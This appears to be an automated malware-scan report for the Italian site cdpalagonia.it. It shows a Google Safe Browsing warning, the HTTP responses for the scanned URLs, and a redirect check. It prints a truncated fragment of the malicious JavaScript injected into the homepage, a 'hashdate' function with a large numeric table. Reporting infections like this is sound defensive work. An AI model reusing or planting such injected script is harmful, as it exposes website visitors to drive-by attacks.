Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cdpalagonia.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.cdpalagonia.it/ | 200 OK Content-Length: 20858 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: | ||
http://sites.google.com/site/creareblog/script-blog/natale/snow8%5B1%5D.js_download?attredirects=0&d=1 | HTTP/1.1 302 Moved Temporarily Cache-Control: private, max-age=0 Connection: close Date: Mon, 02 Mar 2015 20:44:22 GMT Accept-Ranges: none Location: https://sites.google.com/site/creareblog/script-blog/natale/snow8%5B1%5D.js_download?attredirects=0&d=1 Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 Mar 2015 20:44:22 GMT Alternate-Protocol: 80:quic,p=0.08 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
https://sites.google.com/site/creareblog/script-blog/natale/snow8%5b1%5d.js_download?attredirects=0&d=1 | HTTP/1.1 302 Moved Temporarily Cache-Control: private, max-age=0 Connection: close Date: Mon, 02 Mar 2015 20:44:22 GMT Accept-Ranges: none Location: https://fa1ce85d-a-62cb3a1a-s-sites.googlegroups.com/site/creareblog/script-blog/natale/snow8%5B1%5D.js_download?attachauth=ANoY7cqNj3UUFwSITjlwKAU95ukJ1Jdm_iGXmbnbSLLhHO-de-o_G2SvpMmIqwE9yqWn9EhuZOeET6uW1vIGbvykgi1KET2g30b21sqK6x7uLNym0QefIroJAe0x_KmEt0C8XKhYMY6UIdnP661AijdhHsSVrm3uDHKnWzmiAhdmxqQoy_0UwY4Lhvtb2A6gKegLM0F0AkPpywBgoCkvARqahDSQA3zGFmm21LyYKRdFzOzbrpLkaU2xLfZ95ouoGd4zN8IKOiZ1&attredirects=0&d=1 Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 Mar 2015 20:44:22 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
https://fa1ce85d-a-62cb3a1a-s-sites.googlegroups.com/site/creareblog/script-blog/natale/snow8%5b1%5d.js_download?attachauth=anoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhknwzmiahdmxqqoy_0uwy4lhvtb2a6gkeglm0f0akppywbgockvarqahdsqa3zgfmm21lyykrdfzozbrplkau2xlfz95ouogd4zn8ikoiz1&attredirects=0&d=1 | HTTP/1.1 302 Moved Temporarily Cache-Control: private, max-age=0 Connection: close Date: Mon, 02 Mar 2015 20:44:23 GMT Accept-Ranges: none Location: https://www.google.com/a/UniversalLogin?service=jotspot&passive=1209600&continue=https://fa1ce85d-a-62cb3a1a-s-sites.googlegroups.com/site/creareblog/script-blog/natale/snow8%255b1%255d.js_download?attachauth%3Danoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhknwzmiahdmxqqoy_0uwy4lhvtb2a6gkeglm0f0akppywbgockvarqahdsqa3zgfmm21lyykrdfzozbrplkau2xlfz95ouogd4zn8ikoiz1%26attredirects%3D0%26d%3D1&followup=https://fa1ce85d-a-62cb3a1a-s-sites.googlegroups.com/site/creareblog/script-blog/natale/snow8%255b1%255d.js_download?attachauth%3Danoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhknwzmiahdmxqqoy_0uwy4lhvtb2a6gkeglm0f0akppywbgockvarqahdsqa3zgfmm21lyykrdfzozbrplkau2xlfz95ouogd4zn8ikoiz1%26attredirects%3D0%26d%3D1 Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 Mar 2015 20:44:23 GMT Alternate-Protocol: 443:quic,p=0.08 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
https://www.google.com/a/universallogin?service=jotspot&passive=1209600&continue=https://fa1ce85d-a-62cb3a1a-s-sites.googlegroups.com/site/creareblog/script-blog/natale/snow8%255b1%255d.js_download?attachauth%3danoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhknwzmiahdmxqqoy_0uwy4lhvtb2 <span>...541 symbols skipped</span> | HTTP/1.1 301 Moved Permanently Cache-Control: private, max-age=0 Connection: close Date: Mon, 02 Mar 2015 20:44:23 GMT Location: /a/cpanel/universallogin?service=jotspot&passive=1209600&continue=https%3A%2F%2Ffa1ce85d-a-62cb3a1a-s-sites.googlegroups.com%2Fsite%2Fcreareblog%2Fscript-blog%2Fnatale%2Fsnow8%255b1%255d.js_download%3Fattachauth%3Danoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhknwzmiahdmxqqoy_0uwy4lhvtb2a6gkeglm0f0akppywbgockvarqahdsqa3zgfmm21lyykrdfzozbrplkau2xlfz95ouogd4zn8ikoiz1%26attredirects%3D0%26d%3D1&followup=https%3A%2F%2Ffa1ce85d-a-62cb3a1a-s-sites.googlegroups.com%2Fsite%2Fcreareblog%2Fscript-blog%2Fnatale%2Fsnow8%255b1%255d.js_download%3Fattachauth%3Danoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhknwzmiahdmxqqoy_0uwy4lhvtb2a6gkeglm0f0akppywbgockvarqahdsqa3zgfmm21lyykrdfzozbrplkau2xlfz95ouogd4zn8ikoiz1%26attredirects%3D0%26d%3D1 Server: GSE Content-Length: 1156 Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 Mar 2015 20:44:23 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
https://www.google.com/a/cpanel/universallogin?service=jotspot&passive=1209600&continue=https%3a%2f%2ffa1ce85d-a-62cb3a1a-s-sites.googlegroups.com%2fsite%2fcreareblog%2fscript-blog%2fnatale%2fsnow8%255b1%255d.js_download%3fattachauth%3danoy7cqnj3uufwsitjlwkau95ukj1jdm_igxmbnbsllhho-de-o_g2svpmmiqwe9yqwn9ehuzoeet6uw1vigbvykgi1ket2g30b21sqk6x7ulnym0qefirojae0x_kmet0c8xkhymy6uidnp661aijdhhssvrm3udhkn <span>...584 symbols skipped</span> | 404 Not Found Content-Length: 141 Content-Type: text/html | clean |
http://www.google.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://www.google.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://counter1.contatoreaccessi.com/private/counter.js?c=aef37a81e5e668ebd60ae5dade430054 | 200 OK Content-Length: 9000 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cdpalagonia.it
Result:
GET / HTTP/1.1
Host: cdpalagonia.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cdpalagonia.it
Referer: http://www.google.com/search?q=cdpalagonia.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cdpalagonia.it
Referer: http://www.google.com/search?q=cdpalagonia.it
Result:
The result is similar to the first query. There are no suspicious redirects found.